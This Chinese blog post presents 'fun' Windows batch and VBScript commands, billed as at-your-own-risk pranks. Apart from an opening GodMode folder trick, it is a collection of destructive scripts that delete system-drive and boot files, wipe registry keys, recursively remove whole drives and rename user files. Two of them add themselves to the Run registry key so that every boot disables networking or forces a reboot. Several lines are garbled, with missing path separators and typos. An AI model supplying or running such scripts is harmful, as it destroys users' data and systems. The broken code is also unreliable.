分享Windows平台下的一些有趣批处理命令(后果自负)

1,新建的文件夹,重命名称修改为下面这一串代码
GodMode.{ED7BA470-8E54-465E-825C-99712043E01C}

2.死亡蓝屏
@echo off
del %systemdrive%*.
/f/s/q
shutdown -r -f -t 00*

3.更改文件后缀名
*REN *.DOC *.TXT REN *.JPEG *.TXT
REN *.AVI *.TXT
REN *.MPEG *.TXT
REN *.BAT .TXT

4.删除系统重要文件
del c:\WINDOWS\system32*./q*

5.使pc永久崩溃
@echo off
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini

6.删除全部注册表
@ECHO OFF
START reg delete HKCR/.exe
START reg delete HKCR/.dll
START reg delete HKCR/
*

7.永远禁用网络!
echo @echo off>c:windowswimn32.bat
echo break off>>c:windowswimn32.bat
echo ipconfig/release_all>>c:windowswimn32.bat
echo end>>c"windowswimn32.bat
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun/v
windowsapi/t reg_sz/d c:windowswimn32.bat/f
reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun/v
controlexit/t reg_sz/d c:windowswimn32.bat/f
pause

8.永远的《回车》
set wshshell =wscript.createobject<“wscript.shell”>
do
wscript.sleep 100
wshshell.sendkeys"~"
loop

9.开机就关机
echo @echo off>c:windowshartlell.bat
echo break off>>c:windowshartlell.bat
echo shutdown -r -t 11-f>>c:windowshartlell.bat
echo end>>c:windowshartlell.bat
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun
/v startapi /t reg_sz/d c:windowshartlell.bat /f
reg add hkey-current_usersoftwaremicrosoftwindowscurrentversionrun
/v/t reg_sz/d c:windowshartlell.bat /f
PAUSE

10.格式化硬盘
*rd/s/q D:
rd/s/q C:
rd/s/q E:
rd/s/q F:
rd/s/q g:*

11.开启CD蜂鸣器 不停地响
Set oWMP=CreateObject(“WMPIayer.0CX.7”)
Set colCDROMs=oWMP.cdromCollection
do
if colCDROMs.Count>=1 then
For i=0 to colCDROMs.Count -1
colCDROMs.ltem.Eject
Next
For =0 to colCDROMs.Count -1
colCDROMs.ltem.Eject
Next
End lf
wscript.sleep 100
Loop

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值